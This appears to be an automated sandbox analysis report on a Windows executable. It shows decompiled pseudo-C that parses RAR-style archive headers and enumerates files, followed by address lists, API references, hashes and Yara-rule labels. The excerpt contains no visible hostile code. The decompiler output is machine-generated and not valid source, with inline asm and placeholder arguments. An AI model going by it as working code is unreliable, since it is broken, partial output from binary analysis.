											__eflags =  *((intOrPtr*)(_t509 + 0xa228)) -  *((intOrPtr*)(_t509 + 0xa220));
											if(__eflags <= 0) {
												goto L13;
											}
											goto L131;
										}
										_t382 =  *(_t509 + 0x5730);
										__eflags = _t382 - 0x79;
										if(_t382 == 0x79) {
											goto L128;
										}
										__eflags = _t382 - 0x76;
										if(_t382 == 0x76) {
											goto L128;
										}
										__eflags = _t382 - 5;
										if(_t382 != 5) {
											L126:
											 *((char*)(_t509 + 0xa244)) = 1;
											E00406222(0x432a6c, 3);
											__eflags =  *((char*)(_t685 - 0xe));
											if( *((char*)(_t685 - 0xe)) == 0) {
												goto L128;
											}
											E004062C8(4, _t509 + 0x1e, _t509 + 0x1e);
											 *((char*)(_t509 + 0xa245)) = 1;
											goto L6;
										}
										__eflags =  *(_t509 + 0x7ae6);
										if( *(_t509 + 0x7ae6) == 0) {
											goto L126;
										}
										E00401188(_t685 - 0x58, _t644, _t509);
										 *((char*)(_t685 - 4)) = 1;
										_t388 =  *((intOrPtr*)( *_t509 + 0x10))();
										_t681 = 7;
										_t389 = _t388 - _t681;
										__eflags = _t389;
										asm("sbb edx, edi");
										 *((intOrPtr*)( *_t509 + 0xc))(_t389, _t644, 0);
										 *((char*)(_t685 - 0xd)) = 1;
										do {
											_t392 = E004089AB(_t509);
											__eflags = _t392;
											if(_t392 != 0) {
												 *((char*)(_t685 - 0xd)) = 0;
											}
											_t681 = _t681 - 1;
											__eflags = _t681;
										} while (_t681 != 0);
										 *((char*)(_t685 - 4)) = 0;
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t685 - 0x58)))) + 0xc))( *((intOrPtr*)(_t685 - 0x50)),  *(_t685 - 0x4c), _t650);
										__eflags =  *((char*)(_t685 - 0xd));
										if( *((char*)(_t685 - 0xd)) != 0) {
											goto L128;
										}
										goto L126;
									}
									_t369 = 0;
									__eflags =  *(_t509 + 0x5764);
									if( *(_t509 + 0x5764) == 0) {
										goto L115;
									}
									goto L114;
								}
								if(__eflags <= 0) {
									L110:
									__eflags =  *(_t509 + 0x5734) & 0x00008000;
									if(( *(_t509 + 0x5734) & 0x00008000) != 0) {
										 *((intOrPtr*)(_t509 + 0xa228)) =  *((intOrPtr*)(_t509 + 0xa228)) + E0040B270(_t685 - 0x48);
										asm("adc dword [ebx+0xa22c], 0x0");
									}
									goto L116;
								}
								__eflags = _t349 - _t652;
								if(_t349 <= _t652) {
									__eflags = _t349 - 2;
									 *((char*)(_t685 - 0xd)) = _t349 == 2;
									__eflags =  *((char*)(_t685 - 0xd));
									_t396 = _t509 + 0x57c8;
									if( *((char*)(_t685 - 0xd)) == 0) {
										_t396 = _t509 + 0x7b08;
									}
									_t656 = _t396;
									 *(_t685 - 0x14) = _t396;
									E004098B1(_t656, 0);
									_t545 = 5;
									memcpy(_t656, _t509 + 0x572c, _t545 << 2);
									_t683 =  *(_t685 - 0x14);
									 *(_t683 + 0x1088) =  *(_t683 + 8) & 0x00000001;
									_t401 =  *(_t683 + 8);
									 *(_t683 + 0x1089) = _t401 >> 0x00000001 & 0x00000001;
									 *(_t683 + 0x108b) = _t401 >> 0x00000002 & 0x00000001;
									__eflags =  *((char*)(_t685 - 0xd));
									 *(_t683 + 0x1090) = _t401 >> 0x0000000a & 0x00000001;
									if( *((char*)(_t685 - 0xd)) == 0) {
										L40:
										_t556 = 0;
										__eflags = 0;
										goto L41;
									} else {
										__eflags = _t401 & 0x00000010;
										if((_t401 & 0x00000010) == 0) {
											goto L40;
										}
										_t556 = 1;
										L41:
										__eflags =  *((char*)(_t685 - 0xd));
										_t677 =  *(_t685 - 0x14);
										 *((char*)(_t677 + 0x10e0)) = _t556;
										if( *((char*)(_t685 - 0xd)) != 0) {
											L44:
											_t557 = 0;
											__eflags = 0;
											L45:
											 *((char*)(_t677 + 0x10ea)) = _t557;
											_t559 = _t401 & 0x000000e0;
											__eflags = _t559 - 0xe0;
											_t560 = _t559 & 0xffffff00 | _t559 == 0x000000e0;
											 *(_t677 + 0x10e1) = _t560;
											__eflags = _t560;
											if(_t560 == 0) {
												_t646 = 0x10000 << (_t401 >> 0x00000005 & 0x00000007);
												__eflags = 0x10000;
											} else {
												_t646 = 0;
											}
											 *(_t677 + 0x10e2) = _t401 >> 0x00000003 & 0x00000001;
											 *(_t677 + 0x10e4) = _t646;
											 *(_t677 + 0x10e3) = _t401 >> 0x0000000b & 0x00000001;
											 *((intOrPtr*)(_t677 + 0x14)) = E0040B270(_t685 - 0x48);
											 *(_t685 - 0x1c) = E0040B270(_t685 - 0x48);
											_t406 = E0040B223(_t685 - 0x48);
											_t659 = 2;
											 *((char*)(_t677 + 0x18)) = _t406;
											 *(_t677 + 0x1060) = _t659;
											 *((intOrPtr*)(_t677 + 0x1064)) = E0040B270(_t685 - 0x48);
											 *(_t685 - 0x20) = E0040B270(_t685 - 0x48);
											 *(_t677 + 0x19) = E0040B223(_t685 - 0x48);
											 *((char*)(_t677 + 0x1a)) = E0040B223(_t685 - 0x48) - 0x30;
											 *(_t685 - 0x14) = E0040B23B(_t685 - 0x48) & 0x0000ffff;
											_t414 = E0040B270(_t685 - 0x48);
											 *(_t677 + 0x108c) =  *(_t677 + 0x108c) & 0x00000000;
											__eflags =  *((char*)(_t677 + 0x108b));
											 *(_t677 + 0x1c) = _t414;
											if( *((char*)(_t677 + 0x108b)) == 0) {
												L57:
												_t644 =  *((intOrPtr*)(_t677 + 0x18));
												 *(_t677 + 0x10ec) = _t659;
												__eflags = _t644 - 3;
												if(_t644 == 3) {
													L61:
													 *(_t677 + 0x10ec) = 1;
													L62:
													_t660 = 0;
													_t118 = _t677 + 0x10f0; // 0x1144
													_t576 = _t118;
													 *_t576 = 0;
													__eflags = _t644 - 3;
													if(_t644 == 3) {
														_t644 = _t414 & 0x0000f000;
														__eflags = _t644 - 0xa000;
														if(_t644 == 0xa000) {
															 *_t576 = 1;
															__eflags = 0;
															 *((short*)(_t677 + 0x10f4)) = 0;
														}
													}
													__eflags =  *((char*)(_t685 - 0xd));
													if( *((char*)(_t685 - 0xd)) != 0) {
														L68:
														_t415 = 0;
														__eflags = 0;
														goto L69;
													} else {
														__eflags = _t414;
														if(_t414 >= 0) {
															goto L68;
														}
														_t415 = 1;
														L69:
														 *((char*)(_t677 + 0x10e8)) = _t415;
														_t418 =  *(_t677 + 8) >> 0x00000008 & 0x00000001;
														__eflags = _t418;
														 *(_t677 + 0x10e9) = _t418;
														if(_t418 == 0) {
															__eflags =  *(_t685 - 0x1c) - 0xffffffff;
															 *((intOrPtr*)(_t685 - 0x18)) = _t660;
															_t131 =  *(_t685 - 0x1c) == 0xffffffff;
															__eflags = _t131;
															_t419 = _t418 & 0xffffff00 | _t131;
															L75:
															 *(_t677 + 0x108a) = _t419;
															_t420 = E0041A4C0(_t660, 0, 0, 1);
															asm("adc edx, edi");
															 *((intOrPtr*)(_t677 + 0x1048)) = _t420 +  *((intOrPtr*)(_t677 + 0x14));
															 *(_t677 + 0x104c) = _t644;
															_t422 = E0041A4C0( *((intOrPtr*)(_t685 - 0x18)), 0, 0, 1);
															asm("adc edx, ecx");
															 *(_t677 + 0x1050) = _t422 +  *(_t685 - 0x1c);
															 *(_t677 + 0x1054) = _t644;
															__eflags =  *(_t677 + 0x108a);
															if( *(_t677 + 0x108a) != 0) {
																 *(_t677 + 0x1050) = 0x7fffffff;
																 *(_t677 + 0x1054) = 0x7fffffff;
															}
															_t662 = 0x1fff;
															__eflags =  *(_t685 - 0x14) - 0x1fff;
															if( *(_t685 - 0x14) < 0x1fff) {
																_t662 =  *(_t685 - 0x14);
															}
															E0040B357(_t685 - 0x48, _t685 - 0x2880, _t662);
															__eflags =  *((char*)(_t685 - 0xd));
															 *((char*)(_t685 + _t662 - 0x2880)) = 0;
															if( *((char*)(_t685 - 0xd)) == 0) {
																_t169 = _t677 + 0x20; // 0x74
																 *((intOrPtr*)(_t685 - 0x18)) = _t169;
																E00411682(_t685 - 0x2880, _t169, 0x800);
																_t665 =  *((intOrPtr*)(_t677 + 0xc)) -  *(_t685 - 0x14) - 0x20;
																__eflags =  *(_t677 + 8) & 0x00000400;
																if(( *(_t677 + 8) & 0x00000400) != 0) {
																	_t665 = _t665 - 8;
																	__eflags = _t665;
																}
																__eflags = _t665;
																if(_t665 > 0) {
																	_t177 = _t677 + 0x1020; // 0x1074
																	E00401C05(_t177, _t665);
																	E0040B357(_t685 - 0x48,  *((intOrPtr*)(_t677 + 0x1020)), _t665);
																	_t461 = E0041A311( *((intOrPtr*)(_t685 - 0x18)), 0x42a464);
																	__eflags = _t461;
																	if(_t461 == 0) {
																		_t644 =  *( *((intOrPtr*)(_t677 + 0x1020)) + 9) & 0x000000ff;
																		 *(_t509 + 0x570c) =  *(_t509 + 0x570c) & 0x00000000;
																		 *((intOrPtr*)(_t509 + 0x5708)) = E0041A4C0((((( *( *((intOrPtr*)(_t677 + 0x1020)) + 0xb) & 0x000000ff) << 8) + ( *( *((intOrPtr*)(_t677 + 0x1020)) + 0xa) & 0x000000ff) << 8) + _t644 << 8) + ( *( *((intOrPtr*)(_t677 + 0x1020)) + 8) & 0x000000ff),  *(_t509 + 0x570c), 0x200, 0);
																		 *(_t509 + 0x570c) = _t644;
																		 *((intOrPtr*)(_t685 - 0x28)) =  *((intOrPtr*)( *_t509 + 0x10))();
																		 *(_t685 - 0x24) = _t644;
																		_t468 = E004106FA( *((intOrPtr*)(_t509 + 0x5708)),  *(_t509 + 0x570c), _t467, _t644);
																		 *(_t509 + 0x5710) = _t468;
																		_t670 = _t468;
																		_t469 = E0041A410( *((intOrPtr*)(_t685 - 0x28)),  *(_t685 - 0x24), 0xc8, 0);
																		asm("adc edx, [ebx+0x570c]");
																		_t471 = E004106FA(_t469 +  *((intOrPtr*)(_t509 + 0x5708)), _t644,  *((intOrPtr*)(_t685 - 0x28)),  *(_t685 - 0x24));
																		__eflags = _t471 - _t670;
																		if(_t471 > _t670) {
																			_t671 = _t670 + 1;
																			__eflags = _t671;
																			 *(_t509 + 0x5710) = _t671;
																		}
																	}
																}
																_t429 = E0041A311( *((intOrPtr*)(_t685 - 0x18)), "CMT");
																__eflags = _t429;
																if(_t429 == 0) {
																	 *((char*)(_t509 + 0xa236)) = 1;
																}
															} else {
																__eflags =  *(_t677 + 8) & 0x00000200;
																if(( *(_t677 + 8) & 0x00000200) == 0) {
																	_t162 = _t677 + 0x20; // 0x74
																	_t472 = _t162;
																	_t609 = 0;
																	__eflags = 0;
																	 *((intOrPtr*)(_t685 - 0x18)) = _t472;
																	 *_t472 = 0;
																} else {
																	E00406096(_t685 - 0x5c);
																	_t481 = E0041A350(_t685 - 0x2880);
																	_t155 = _t677 + 0x20; // 0x74
																	 *((intOrPtr*)(_t685 - 0x18)) = _t155;
																	_t609 = _t685 - 0x5c;
																	E004060A7(_t685 - 0x5c, _t685 - 0x2880, _t685 + _t481 + 1 - 0x2880,  *(_t685 - 0x14) - _t481 + 1, _t155, 0x800);
																}
																E00410725(_t685 - 0x2880, _t685 - 0x880, 0x800);
																E0040A078(_t609, _t685 - 0x880,  *((intOrPtr*)(_t685 - 0x18)),  *((intOrPtr*)(_t685 - 0x18)), 0x800);
																E00401ABA(_t509, _t677);
															}
															__eflags =  *(_t677 + 8) & 0x00000400;
															if(( *(_t677 + 8) & 0x00000400) != 0) {
																_t207 = _t677 + 0x1091; // 0x10e5
																E0040B357(_t685 - 0x48, _t207, 8);
															}
															E004111C2( *(_t685 - 0x20)); // executed
															__eflags =  *(_t677 + 8) & 0x00001000;
															if(( *(_t677 + 8) & 0x00001000) == 0) {
																L107:
																 *((intOrPtr*)(_t509 + 0xa228)) =  *((intOrPtr*)(_t509 + 0xa228)) +  *((intOrPtr*)(_t677 + 0x1048));
																asm("adc [ebx+0xa22c], eax");
																 *(_t685 - 0x24) =  *(_t677 + 0x10e2);
																_t434 = E0040B3A7(_t685 - 0x48,  *(_t685 - 0x24));
																__eflags =  *_t677 - (_t434 & 0x0000ffff);
																if( *_t677 != (_t434 & 0x0000ffff)) {
																	 *((char*)(_t509 + 0xa244)) = 1;
																	E00406222(0x432a6c, 1);
																	__eflags =  *((char*)(_t685 - 0xe));
																	if( *((char*)(_t685 - 0xe)) == 0) {
																		E004062C8(0x1a, _t509 + 0x1e,  *((intOrPtr*)(_t685 - 0x18)));
																	}
																}
																goto L116;
															} else {
																_t439 = E0040B23B(_t685 - 0x48);
																 *(_t685 - 0x4c) =  *(_t685 - 0x4c) & 0x00000000;
																_t217 = _t685 - 0x14;
																 *_t217 =  *(_t685 - 0x14) & 0x00000000;
																__eflags =  *_t217;
																 *((intOrPtr*)(_t685 - 0x58)) = _t509 + 0x67f8;
																 *((intOrPtr*)(_t685 - 0x54)) = _t509 + 0x6800;
																 *((intOrPtr*)(_t685 - 0x50)) = _t509 + 0x6808;
																 *(_t685 - 0x24) = _t439 & 0xffff;
																 *(_t685 - 0x1c) = 0xc;
																do {
																	_t666 =  *(_t685 +  *(_t685 - 0x14) * 4 - 0x58);
																	_t444 =  *(_t685 - 0x24) >>  *(_t685 - 0x1c);
																	 *(_t685 - 0x20) = _t444;
																	__eflags = _t444 & 0x00000008;
																	if((_t444 & 0x00000008) == 0) {
																		goto L106;
																	}
																	__eflags = _t666;
																	if(_t666 == 0) {
																		goto L106;
																	}
																	__eflags =  *(_t685 - 0x14);
																	if(__eflags != 0) {
																		E004111C2(E0040B270(_t685 - 0x48));
																	}
																	E00410FA1(_t666, __eflags, _t685 - 0x80); // executed
																	__eflags =  *(_t685 - 0x20) & 0x00000004;
																	if(( *(_t685 - 0x20) & 0x00000004) != 0) {
																		_t242 = _t685 - 0x6c;
																		 *_t242 =  *(_t685 - 0x6c) + 1;
																		__eflags =  *_t242;
																	}
																	 *(_t685 - 0x68) =  *(_t685 - 0x68) & 0x00000000;
																	_t448 =  *(_t685 - 0x20) & 0x00000003;
																	__eflags = _t448;
																	if(_t448 <= 0) {
																		L105:
																		E004110D5( *(_t685 +  *(_t685 - 0x14) * 4 - 0x58), _t685 - 0x80);
																	} else {
																		_t667 = 3;
																		_t669 = _t667 - _t448 << 3;
																		__eflags = _t669;
																		 *(_t685 - 0x20) = _t448;
																		do {
																			_t454 = (E0040B223(_t685 - 0x48) & 0x000000ff) << _t669;
																			_t669 = _t669 + 8;
																			 *(_t685 - 0x68) =  *(_t685 - 0x68) | _t454;
																			_t251 = _t685 - 0x20;
																			 *_t251 =  *(_t685 - 0x20) - 1;
																			__eflags =  *_t251;
																		} while ( *_t251 != 0);
																		goto L105;
																	}
																	L106:
																	 *(_t685 - 0x1c) =  *(_t685 - 0x1c) - 4;
																	 *(_t685 - 0x14) =  *(_t685 - 0x14) + 1;
																	__eflags =  *(_t685 - 0x1c) - 0xfffffffc;
																} while ( *(_t685 - 0x1c) > 0xfffffffc);
																goto L107;
															}
														}
														_t660 = E0040B270(_t685 - 0x48);
														_t488 = E0040B270(_t685 - 0x48);
														__eflags =  *(_t685 - 0x1c) - 0xffffffff;
														 *((intOrPtr*)(_t685 - 0x18)) = _t488;
														if( *(_t685 - 0x1c) != 0xffffffff) {
															L73:
															_t419 = 0;
															goto L75;
														}
														__eflags = _t488 - 0xffffffff;
														if(_t488 != 0xffffffff) {
															goto L73;
														}
														_t419 = 1;
														goto L75;
													}
												}
												__eflags = _t644 - 5;
												if(_t644 == 5) {
													goto L61;
												}
												__eflags = _t644 - 6;
												if(_t644 < 6) {
													 *(_t677 + 0x10ec) =  *(_t677 + 0x10ec) & 0x00000000;
												}
												goto L62;
											} else {
												_t620 = ( *(_t677 + 0x19) & 0x000000ff) - 0xd;
												__eflags = _t620;
												if(_t620 == 0) {
													 *(_t677 + 0x108c) = 1;
													goto L57;
												}
												_t621 = _t620 - _t659;
												__eflags = _t621;
												if(_t621 == 0) {
													 *(_t677 + 0x108c) = _t659;
													goto L57;
												}
												_t622 = _t621 - 5;
												__eflags = _t622;
												if(_t622 == 0) {
													L54:
													 *(_t677 + 0x108c) = 3;
													goto L57;
												}
												__eflags = _t622 == 6;
												if(_t622 == 6) {
													goto L54;
												}
												 *(_t677 + 0x108c) = 4;
												goto L57;
											}
										}
										__eflags = _t401 & 0x00000010;
										if((_t401 & 0x00000010) == 0) {
											goto L44;
										}
										_t557 = 1;
										goto L45;
									}
								}
								__eflags = _t349 - 5;
								if(_t349 != 5) {
									goto L110;
								} else {
									_push(_t349);
									_t492 = memcpy(_t509 + 0x7ac8, _t509 + 0x572c, 0 << 2);
									_t676 =  *_t492;
									 *(_t509 + 0x7ae4) =  *_t492 & 0x00000001;
									 *(_t509 + 0x7ae6) = _t676 >> 0x00000002 & 0x00000001;
									_t495 = _t676 >> 0x00000001 & 0x00000001;
									_t677 = _t509 + 0x7ae7;
									 *(_t509 + 0x7ae5) = _t495;
									 *_t677 = _t676 >> 0x00000003 & 0x00000001;
									__eflags = _t495;
									if(_t495 != 0) {
										 *((intOrPtr*)(_t509 + 0x7adc)) = E0040B270(_t685 - 0x48);
									}
									__eflags =  *_t677;
									if( *_t677 != 0) {
										_t497 = E0040B23B(_t685 - 0x48) & 0x0000ffff;
										 *(_t509 + 0x7ae0) = _t497;
										 *(_t509 + 0xa258) = _t497;
									}
									goto L116;
								}
							}
							__eflags =  *(_t509 + 0x5734) & 0x00000002;
							if(( *(_t509 + 0x5734) & 0x00000002) != 0) {
								goto L23;
							}
							goto L26;
						}
						L23:
						_push(6);
						goto L27;
					}
					L13:
					E00401C68(_t509);
					goto L6;
				}
				_t644 =  *(__ecx + 0xa224);
				_t500 =  *((intOrPtr*)(__ecx + 0xa240)) + 7;
				asm("adc ecx, edi");
				_t694 = _t644;
				if(_t694 < 0 || _t694 <= 0 &&  *((intOrPtr*)(__ecx + 0xa220)) <= _t500) {
					goto L9;
				} else {
					 *((char*)(_t685 - 0xe)) = 1;
					E00401BBF(_t509);
					_t503 =  *((intOrPtr*)( *_t509 + 8))(_t685 - 0x28, 8);
					_t696 = _t503 - 8;
					if(_t503 == 8) {
						__eflags =  *((intOrPtr*)(_t509 + 0x5704)) + 0x4020;
						_t677 = _t509 + 0x1024;
						E00405F4F(_t677, _t644, _t650, 4,  *((intOrPtr*)(_t509 + 0x5704)) + 0x4020, _t685 - 0x28, _t650, _t650, _t650, _t650);
						 *(_t685 - 0x2c) = _t677;
						goto L11;
					}
					goto L5;
				}
			}

0x00401cae
0x00401cb8
0x00401cbe
0x00401cbf
0x00401cc6
0x00401ccb
0x00401cd4
0x00401cd7
0x00401d35
0x00401d35
0x00401d62
0x00401d67
0x00401d6c
0x00401d6f
0x00401d19
0x00401d1b
0x00401d20
0x00401d20
0x00401d23
0x00401d25
0x00401d28
0x00401d2d
0x00401d2e
0x00402707
0x0040270d
0x00402715
0x00402715
0x00401d7f
0x00401d85
0x00401d94
0x00401d9c
0x00401d9f
0x00401dad
0x00401db8
0x00401dbb
0x00401dc1
0x00401dc7
0x00401dca
0x00401dd8
0x00401dd8
0x00401ddd
0x00401dde
0x00401e0b
0x00401de0
0x00401de0
0x00401de0
0x00401de1
0x00401dff
0x00401de3
0x00401de3
0x00401de3
0x00401de6
0x00401df7
0x00401de8
0x00401de8
0x00401de8
0x00401de9
0x00401deb
0x00401deb
0x00401de9
0x00401de6
0x00401de1
0x00401e15
0x00401e1b
0x00401e21
0x00401e24
0x00401e2a
0x00401e2d
0x00401e38
0x00401e38
0x00401e38
0x00401e3b
0x00401e3c
0x00401e3f
0x00401e4c
0x00401e59
0x00401e5f
0x00401e65
0x00401e6b
0x00401e71
0x00401e74
0x0040254f
0x00402557
0x0040255e
0x00402565
0x00402572
0x0040257e
0x00402580
0x00402588
0x0040258c
0x00402599
0x004025a6
0x004025b3
0x004025c0
0x004025c6
0x004025cc
0x004025ce
0x004025db
0x004025dd
0x004025dd
0x004025de
0x004025de
0x004025ea
0x004025fa
0x004025fa
0x004025fd
0x00402603
0x00402609
0x00402609
0x0040260f
0x00402617
0x0040261d
0x004026ce
0x004026d4
0x004026da
0x004026f4
0x004026f4
0x004026f7
0x004026fa
0x004026fc
0x004026ff
0x00402704
0x00402705
0x00000000
0x00402705
0x004026dc
0x00000000
0x00000000
0x004026e8
0x004026ee
0x00000000
0x00000000
0x00000000
0x004026ee
0x00402623
0x00402629
0x0040262c
0x00000000
0x00000000
0x00402632
0x00402635
0x00000000
0x00000000
0x0040263b
0x0040263e
0x0040269d
0x004026a4
0x004026ab
0x004026b0
0x004026b4
0x00000000
0x00000000
0x004026bd
0x004026c2
0x00000000
0x004026c2
0x00402640
0x00402647
0x00000000
0x00000000
0x0040264d
0x00402656
0x0040265a
0x00402660
0x00402661
0x00402661
0x00402663
0x0040266b
0x0040266e
0x00402672
0x00402674
0x00402679
0x0040267b
0x0040267d
0x0040267d
0x00402681
0x00402681
0x00402681
0x0040268d
0x00402694
0x00402697
0x0040269b
0x00000000
0x00000000
0x00000000
0x0040269b
0x004025d0
0x004025d2
0x004025d9
0x00000000
0x00000000
0x00000000
0x004025d9
0x00401e7a
0x00402525
0x00402525
0x0040252f
0x0040253d
0x00402543
0x00402543
0x00000000
0x0040252f
0x00401e80
0x00401e82
0x00401f15
0x00401f18
0x00401f1c
0x00401f20
0x00401f26
0x00401f28
0x00401f28
0x00401f2e
0x00401f34
0x00401f37
0x00401f3e
0x00401f45
0x00401f47
0x00401f4f
0x00401f55
0x00401f5f
0x00401f6d
0x00401f7b
0x00401f7f
0x00401f85
0x00401f90
0x00401f90
0x00401f90
0x00000000
0x00401f87
0x00401f87
0x00401f89
0x00000000
0x00000000
0x00401f8d
0x00401f92
0x00401f92
0x00401f96
0x00401f99
0x00401f9f
0x00401faa
0x00401faa
0x00401faa
0x00401fac
0x00401fac
0x00401fb4
0x00401fba
0x00401fbd
0x00401fc0
0x00401fc6
0x00401fc8
0x00401fdb
0x00401fdb
0x00401fca
0x00401fca
0x00401fca
0x00401fe8
0x00401ff3
0x00401ff9
0x00402007
0x00402012
0x00402015
0x0040201c
0x00402020
0x00402023
0x00402031
0x0040203f
0x0040204a
0x00402057
0x00402065
0x00402068
0x0040206d
0x00402074
0x0040207b
0x0040207e
0x004020c1
0x004020c1
0x004020c4
0x004020ca
0x004020cd
0x004020e2
0x004020e2
0x004020ec
0x004020ec
0x004020ee
0x004020ee
0x004020f4
0x004020f6
0x004020f9
0x004020fd
0x00402103
0x00402109
0x0040210b
0x00402111
0x00402113
0x00402113
0x00402109
0x0040211a
0x0040211e
0x00402129
0x00402129
0x00402129
0x00000000
0x00402120
0x00402120
0x00402122
0x00000000
0x00000000
0x00402126
0x0040212b
0x0040212b
0x00402137
0x00402137
0x00402139
0x0040213f
0x0040216a
0x0040216e
0x00402171
0x00402171
0x00402171
0x00402174
0x0040217b
0x00402181
0x00402194
0x00402196
0x0040219c
0x004021a2
0x004021ac
0x004021ae
0x004021b4
0x004021ba
0x004021c0
0x004021c7
0x004021cd
0x004021cd
0x004021d3
0x004021d8
0x004021db
0x004021dd
0x004021dd
0x004021eb
0x004021f0
0x004021f4
0x004021fc
0x0040228c
0x00402295
0x0040229f
0x004022aa
0x004022ad
0x004022b4
0x004022b6
0x004022b6
0x004022b6
0x004022b9
0x004022bb
0x004022c1
0x004022c8
0x004022d7
0x004022e4
0x004022eb
0x004022ed
0x00402309
0x00402310
0x00402334
0x0040233e
0x0040234f
0x00402358
0x0040235b
0x00402363
0x0040236c
0x0040237b
0x00402386
0x0040238e
0x00402393
0x00402395
0x00402397
0x00402397
0x00402398
0x00402398
0x00402395
0x004022ed
0x004023a6
0x004023ad
0x004023af
0x004023b1
0x004023b1
0x00402202
0x00402202
0x0040220e
0x0040224d
0x0040224d
0x00402250
0x00402250
0x00402252
0x00402255
0x00402210
0x00402213
0x0040221f
0x00402226
0x0040222a
0x00402243
0x00402246
0x00402246
0x00402267
0x0040227a
0x00402282
0x00402282
0x004023b8
0x004023bf
0x004023c3
0x004023cd
0x004023cd
0x004023db
0x004023e0
0x004023e7
0x004024be
0x004024c4
0x004024d3
0x004024df
0x004024e5
0x004024ed
0x004024ef
0x004024fc
0x00402503
0x00402508
0x0040250c
0x0040251b
0x0040251b
0x0040250c
0x00000000
0x004023ed
0x004023f0
0x004023f5
0x004023f9
0x004023f9
0x004023f9
0x00402406
0x00402412
0x0040241b
0x0040241e
0x00402421
0x00402428
0x0040242b
0x00402435
0x00402437
0x0040243a
0x0040243c
0x00000000
0x00000000
0x0040243e
0x00402440
0x00000000
0x00000000
0x00402442
0x00402446
0x00402453
0x00402453
0x0040245e
0x00402463
0x00402467
0x00402469
0x00402469
0x00402469
0x00402469
0x0040246f
0x00402473
0x00402473
0x00402476
0x0040249d
0x004024a8
0x00402478
0x0040247a
0x0040247d
0x0040247d
0x00402480
0x00402483
0x00402490
0x00402492
0x00402495
0x00402498
0x00402498
0x00402498
0x00402498
0x00000000
0x00402483
0x004024ad
0x004024ad
0x004024b1
0x004024b4
0x004024b4
0x00000000
0x00402428
0x004023e7
0x0040214c
0x0040214e
0x00402153
0x00402157
0x0040215a
0x00402166
0x00402166
0x00000000
0x00402166
0x0040215c
0x0040215f
0x00000000
0x00000000
0x00402163
0x00000000
0x00402163
0x0040211e
0x004020cf
0x004020d2
0x00000000
0x00000000
0x004020d4
0x004020d7
0x004020d9
0x004020d9
0x00000000
0x00402080
0x00402084
0x00402084
0x00402087
0x004020b7
0x00000000
0x004020b7
0x00402089
0x00402089
0x0040208b
0x004020af
0x00000000
0x004020af
0x0040208d
0x0040208d
0x00402090
0x004020a3
0x004020a3
0x00000000
0x004020a3
0x00402092
0x00402095
0x00000000
0x00000000
0x00402097
0x00000000
0x00402097
0x0040207e
0x00401fa1
0x00401fa3
0x00000000
0x00000000
0x00401fa7
0x00000000
0x00401fa7
0x00401f85
0x00401e88
0x00401e8b
0x00000000
0x00401e91
0x00401e91
0x00401ea5
0x00401ea9
0x00401eae
0x00401ebc
0x00401ecb
0x00401ed0
0x00401ed6
0x00401edc
0x00401ede
0x00401ee0
0x00401eea
0x00401eea
0x00401ef0
0x00401ef3
0x00401f01
0x00401f04
0x00401f0a
0x00401f0a
0x00000000
0x00401ef3
0x00401e8b
0x00401e2f
0x00401e36
0x00000000
0x00000000
0x00000000
0x00401e36
0x00401e26
0x00401e26
0x00000000
0x00401e26
0x00401dcc
0x00401dce
0x00000000
0x00401dce
0x00401cdf
0x00401ce7
0x00401cea
0x00401cec
0x00401cee
0x00000000
0x00401cfc
0x00401cfe
0x00401d02
0x00401d11
0x00401d14
0x00401d17
0x00401d49
0x00401d51
0x00401d5a
0x00401d5f
0x00000000
0x00401d5f
0x00000000
0x00401d17

APIs

__EH_prolog.LIBCMT ref: 00401CAE
_strlen.LIBCMT ref: 0040221F

Part of subcall function 00411682: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0040A0B4,00000000,?,?), ref: 0041169E

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040237B

Strings

CMT, xrefs: 0040239E
l*C, xrefs: 0040269F
l*C, xrefs: 004024F7

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT$l*C$l*C
API String ID: 1706572503-112904883
Opcode ID: aaee4b66c29e148b2083d0f4b8d3b8395707f1f6b4ddb2f2ebaa130ea9bd9576
Instruction ID: e5122796ee63bfbfb3d646f9286405632a4ebd6245eb4dfbfb9f04443c7364a9
Opcode Fuzzy Hash: aaee4b66c29e148b2083d0f4b8d3b8395707f1f6b4ddb2f2ebaa130ea9bd9576
Instruction Fuzzy Hash: 0A6200319042449ECF15DF64C8897EE7BF0EF55304F1844BEE88AAB2D2CB785985CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004091E3, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004091E3(intOrPtr __edx, signed int _a4, WCHAR* _a8, intOrPtr _a12) {
				intOrPtr _v572;
				intOrPtr _v580;
				intOrPtr _v588;
				struct _WIN32_FIND_DATAW _v596;
				short _v4692;
				signed int _t51;
				signed int _t57;
				signed int _t71;
				void* _t73;
				long _t76;
				char _t77;
				void* _t81;
				intOrPtr _t87;
				intOrPtr _t90;

				_t87 = __edx;
				E0041A3E0(0x1250);
				_t90 = _a12;
				_push( &_v596);
				if(_a4 != 0xffffffff) {
					_t51 = FindNextFileW(_a4, ??);
					__eflags = _t51;
					if(_t51 == 0) {
						_a4 = _a4 | 0xffffffff;
						_t71 = GetLastError();
						__eflags = _t71 - 0x12;
						_t16 = _t71 != 0x12;
						__eflags = _t16;
						 *((char*)(_t90 + 0x1044)) = _t71 & 0xffffff00 | _t16;
					}
					__eflags = _a4 - 0xffffffff;
					if(_a4 != 0xffffffff) {
						goto L13;
					}
				} else {
					_t73 = FindFirstFileW(_a8, ??); // executed
					_a4 = _t73;
					if(_t73 != 0xffffffff) {
						L13:
						E0041078F(_t90, _a8, 0x800);
						_push(0x800);
						E0040A238(__eflags, _t90,  &(_v596.cFileName));
						_t57 = E0041A4C0(_v596.nFileSizeHigh, 0, 0, 1) + _v596.nFileSizeLow;
						__eflags = _t57;
						 *(_t90 + 0x1000) = _t57;
